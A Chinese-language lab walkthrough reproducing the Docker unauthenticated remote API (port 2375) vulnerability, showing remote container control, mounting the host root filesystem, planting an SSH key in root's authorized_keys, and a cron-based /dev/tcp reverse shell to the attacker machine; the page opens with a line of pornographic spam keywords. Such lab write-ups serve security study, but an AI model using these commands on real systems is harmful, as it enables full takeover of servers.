国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Docker未授權(quán)訪問漏洞

這篇具有很好參考價值的文章主要介紹了Docker未授權(quán)訪問漏洞。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

漏洞產(chǎn)生原因 (www.hetianlab.com)

如果在docker上配置了遠(yuǎn)程訪問,docker 節(jié)點上會開放一個TCP端口2375,綁定在0.0.0.0上,如果沒有做限制訪問來源的話,攻擊者就可以通過Docker未授權(quán)來控制服務(wù)器。  

漏洞影響

攻擊者利用 dockerclient 或者 http 直接請求就可以訪問這個API,可能導(dǎo)致敏感信息泄露,也可以刪除Docker上的數(shù)據(jù)。攻擊者可進(jìn)一步利用Docker自身特性,直接訪問宿主機(jī)上的敏感信息,或?qū)γ舾形募M(jìn)行修改,最終完全控制服務(wù)器。  

實驗環(huán)境

目標(biāo)機(jī)器: CentOS7+Docker、IP:10.1.1.200  
  
攻擊機(jī)器:Kali+Docker、IP:10.1.1.100  
  

信息收集

nmap信息收集

發(fā)現(xiàn)開放:
22:ssh默認(rèn)端口
2375:docker遠(yuǎn)程操控

docker未授權(quán)訪問漏洞,漏洞復(fù)現(xiàn),docker,容器,運維,web安全,安全

利用2375端口

通過瀏覽器進(jìn)行訪問,如果頁面顯示message ”page not found" 代表存在漏洞,如果頁面顯示空白,可以通過info獲取docker信息

docker未授權(quán)訪問漏洞,漏洞復(fù)現(xiàn),docker,容器,運維,web安全,安全
docker未授權(quán)訪問漏洞,漏洞復(fù)現(xiàn),docker,容器,運維,web安全,安全

獲取image列表

10.1.1.200:2375/images/json

docker未授權(quán)訪問漏洞,漏洞復(fù)現(xiàn),docker,容器,運維,web安全,安全

docker未授權(quán)訪問漏洞利用

docker遠(yuǎn)程連接目標(biāo)機(jī)器

通過docker client使用 -H 參數(shù)連接目標(biāo)的docker,并使用ps-a命令查尋目標(biāo)系統(tǒng)運行的所有容器

docker -H tcp://10.1.1.200 ps -a #列出所有容器

docker未授權(quán)訪問漏洞,漏洞復(fù)現(xiàn),docker,容器,運維,web安全,安全

docker -H tcp://10.1.1.200 images #列出所有鏡像

docker未授權(quán)訪問漏洞,漏洞復(fù)現(xiàn),docker,容器,運維,web安全,安全

進(jìn)入容器方法一

docker client連接目標(biāo),ps -a 查看哪些容器已經(jīng)停止:

docker未授權(quán)訪問漏洞,漏洞復(fù)現(xiàn),docker,容器,運維,web安全,安全

通過strat命令啟動一個停止的容器:

docker未授權(quán)訪問漏洞,漏洞復(fù)現(xiàn),docker,容器,運維,web安全,安全

attach 命令連接一個已經(jīng)啟動的容器:

docker未授權(quán)訪問漏洞,漏洞復(fù)現(xiàn),docker,容器,運維,web安全,安全

這樣就能夠獲得一個docker容器的shell

進(jìn)入容器方法二

新運行一個容器并將entrypoint設(shè)置為/bin/bash或者/bin/sh,掛載點設(shè)置為服務(wù)器的根目錄掛載至/mnt目錄下(需要root權(quán)限啟動docker)

docker -H tcp://10.1.1.200 run -it -v /:/mnt --entrypoint /bin/bash 4c9608fd76ba(鏡像id)

docker未授權(quán)訪問漏洞,漏洞復(fù)現(xiàn),docker,容器,運維,web安全,安全

docker未授權(quán)寫ssh公鑰獲得shell

啟動一個容器,掛載宿主機(jī)的/mnt目錄(上一步驟已掛載),之后將攻擊者的ssh公鑰~/.ssh/id_rsa.pub的內(nèi)容寫到入宿主機(jī)的/root/.ssh/authorized_keys文件中,之后就可以用root賬戶直接登錄了

首先kali生成id_rsa公鑰:ssh-keygen -t rsa

docker未授權(quán)訪問漏洞,漏洞復(fù)現(xiàn),docker,容器,運維,web安全,安全

生成的公鑰在/root/.ssh/ 目錄下:

docker未授權(quán)訪問漏洞,漏洞復(fù)現(xiàn),docker,容器,運維,web安全,安全

將生成公鑰寫入到目標(biāo)/root/.ssh/authorized_keys文件中:

docker未授權(quán)訪問漏洞,漏洞復(fù)現(xiàn),docker,容器,運維,web安全,安全

>這個代表的意思為覆蓋,>>代表為追加

此處的路徑為之前所掛載的路徑,如果掛載root路徑那就為/root/root/.ssh

通過ssh進(jìn)行連接,獲取宿主機(jī)的shell

docker未授權(quán)訪問漏洞,漏洞復(fù)現(xiàn),docker,容器,運維,web安全,安全

docker未授權(quán)寫定時任務(wù)獲得shell

啟動一個容器,掛載宿主機(jī)的目錄(此前已掛載),之后將反彈shell的腳本寫入到/etc/crontab中,攻擊機(jī)nc -lvvp port會得到一個反彈的shell。

將反彈shell的腳本寫入到/var/spool/cron/root(centos系統(tǒng))或/var/spool/cron/crontabs/root(ubuntu系統(tǒng))

kali開啟監(jiān)聽:

docker未授權(quán)訪問漏洞,漏洞復(fù)現(xiàn),docker,容器,運維,web安全,安全

寫入反彈shell的腳本

****為定時任務(wù),此處為每分鐘執(zhí)行一次 /bin/bash -i >& /dev/tcp/10.1.1.100/1212 0>&1

docker未授權(quán)訪問漏洞,漏洞復(fù)現(xiàn),docker,容器,運維,web安全,安全

docker未授權(quán)訪問漏洞,漏洞復(fù)現(xiàn),docker,容器,運維,web安全,安全文章來源地址http://www.zghlxwxcb.cn/news/detail-667180.html

到了這里,關(guān)于Docker未授權(quán)訪問漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進(jìn)行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • Docker未授權(quán)訪問漏洞(www.hetianlab.com)

    Docker未授權(quán)訪問漏洞(www.hetianlab.com)

    Docker是一個開源的引擎,可以輕松的為任何應(yīng)用創(chuàng)建一個輕量級的、可移植的、自給自足的容器。開發(fā)者在筆記本上編譯測試通過的容器可以批量地在生產(chǎn)環(huán)境中部署,包括VMs(虛擬機(jī))、bare metal、OpenStack 集群和其他的基礎(chǔ)應(yīng)用平臺。 產(chǎn)生原因 如果在docker上配置了遠(yuǎn)程訪問,d

    2024年02月04日
    瀏覽(24)
  • springboot未授權(quán)漏洞(漏洞復(fù)現(xiàn)Springboot未授權(quán)訪問及修復(fù))

    Actuator 的核心是端點 Endpoint,它用來監(jiān)視應(yīng)用程序及交互,spring-boot-actuator 中已經(jīng)內(nèi)置了非常多的Endpoint(health、info、beans、metrics、httptrace、shutdown等等),同時也允許我們自己擴(kuò)展自己的Endpoints。每個 Endpoint 都可以啟用和禁用。要遠(yuǎn)程訪問 Endpoint,還必須通過 JMX 或 HTTP 進(jìn)

    2024年02月05日
    瀏覽(27)
  • 漏洞復(fù)現(xiàn) - - - Springboot未授權(quán)訪問

    漏洞復(fù)現(xiàn) - - - Springboot未授權(quán)訪問

    目錄 一, 未授權(quán)訪問是什么? 二,Actuator介紹 三,怎么進(jìn)行漏洞發(fā)現(xiàn)呢? 四,實驗環(huán)境 五,漏洞復(fù)現(xiàn) 1.通過訪問env獲取全部環(huán)境屬性 2.通過/trace提供基本的http請求跟蹤信息 3.利用反序列化進(jìn)行g(shù)etshell ?1.啟動腳本 2.開啟監(jiān)聽 ?3.使用bp抓取一個/env的包 4.修改POST數(shù)據(jù) 未授權(quán)

    2024年01月20日
    瀏覽(18)
  • Druid未授權(quán)訪問 漏洞復(fù)現(xiàn)

    Druid未授權(quán)訪問 漏洞復(fù)現(xiàn)

    Druid是阿里巴巴數(shù)據(jù)庫事業(yè)部出品,為監(jiān)控而生的數(shù)據(jù)庫連接池。Druid提供的監(jiān)控功能,監(jiān)控SQL的執(zhí)行時間、監(jiān)控Web URI的請求、Session監(jiān)控。當(dāng)開發(fā)者配置不當(dāng)時就可能造成未授權(quán)訪問漏洞。 1、通過目錄掃描或手工輸入路徑http://www.xxxx.com/druid/index.html,發(fā)現(xiàn)存在Druid 未授權(quán)訪

    2024年02月11日
    瀏覽(15)
  • 【Elasticsearch 未授權(quán)訪問漏洞復(fù)現(xiàn)】

    【Elasticsearch 未授權(quán)訪問漏洞復(fù)現(xiàn)】

    ElasticSearch是一個基于Lucene的搜索服務(wù)器。它提供了一個分布式多用戶能力的全文搜索引擎,基于RESTful web接口。Elasticsearch是用Java開發(fā)的,并作為Apache許可條款下的開放源碼發(fā)布,是當(dāng)前流行的企業(yè)級搜索引擎。Elasticsearch的增刪改查操作全部由http接口完。由于Elasticsearch授權(quán)

    2024年02月05日
    瀏覽(21)
  • web滲透測試漏洞復(fù)現(xiàn):Elasticsearch未授權(quán)漏洞復(fù)現(xiàn)

    Elasticsearch 是一款 Java 編寫的企業(yè)級搜索服務(wù),它以分布式多用戶能力和全文搜索引擎為特點,采用 RESTful web 接口。這款搜索引擎由 Java 開發(fā),作為 Apache 許可下的開源軟件發(fā)布,是流行的企業(yè)級搜索引擎之一。Elasticsearch 的增刪改查操作都通過 http 接口完成。開源的版本可能

    2024年04月10日
    瀏覽(27)
  • Redis未授權(quán)訪問漏洞搭建復(fù)現(xiàn)

    Redis未授權(quán)訪問漏洞搭建復(fù)現(xiàn)

    今天我們來學(xué)習(xí)一下什么是Redis未授權(quán)訪問漏洞,以及各種利用方法。 文章目錄 一、 什么是Redis未授權(quán)訪問漏洞 二、 Redis環(huán)境搭建 三、漏洞利用 四、漏洞總結(jié) 五、漏洞防護(hù) ??????? ?Redis因配置不當(dāng)可以導(dǎo)致未授權(quán)訪問,被攻擊者惡意利用。當(dāng)前流行的針對Redis未授權(quán)訪

    2024年02月06日
    瀏覽(21)
  • 漏洞復(fù)現(xiàn) || Hadoop未授權(quán)訪問反彈Shell漏洞

    漏洞復(fù)現(xiàn) || Hadoop未授權(quán)訪問反彈Shell漏洞

    技術(shù)文章僅供參考,任何個人和組織使用網(wǎng)絡(luò)應(yīng)當(dāng)遵守憲法法律,遵守公共秩序,尊重社會公德,不得危害網(wǎng)絡(luò)安全,不得利用網(wǎng)絡(luò)從事危害國家安全、榮譽和利益,未經(jīng)授權(quán)請勿利用文章中的技術(shù)資料對任何計算機(jī)系統(tǒng)進(jìn)行入侵操作。利用此文所提供的信息而造成的直接或

    2024年02月16日
    瀏覽(15)
  • Springboot Actuator未授權(quán)訪問漏洞復(fù)現(xiàn)

    Springboot Actuator未授權(quán)訪問漏洞復(fù)現(xiàn)

    更新時間:2022.07.20 Spring Boot Actuator 模塊提供了生產(chǎn)級別的功能,比如健康檢查,審計,指標(biāo)收集,HTTP 跟蹤等,幫助監(jiān)控和管理Spring Boot 應(yīng)用。這個模塊是一個采集應(yīng)用內(nèi)部信息暴露給外部的模塊,上述的功能都可以通過HTTP 和 JMX 訪問。(來源:https://mp.weixin.qq.com/s/qY-hBSa

    2023年04月16日
    瀏覽(18)
  • Hadoop未授權(quán)訪問 getshell——漏洞復(fù)現(xiàn)

    Hadoop未授權(quán)訪問 getshell——漏洞復(fù)現(xiàn)

    ?Hadoop未授權(quán)訪問漏洞介紹 Hadoop是一個由Apache基金會所開發(fā)的分布式系統(tǒng)基礎(chǔ)架構(gòu),由于服務(wù)器直接在開放了 Hadoop 機(jī)器 HDFS 的 50070 web 端口及部分默認(rèn)服務(wù)端口,黑客可以通過命令行操作多個目錄下的數(shù)據(jù),如進(jìn)行刪除,下載,目錄瀏覽甚至命令執(zhí)行等操作,產(chǎn)生極大的危害

    2024年04月16日
    瀏覽(26)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包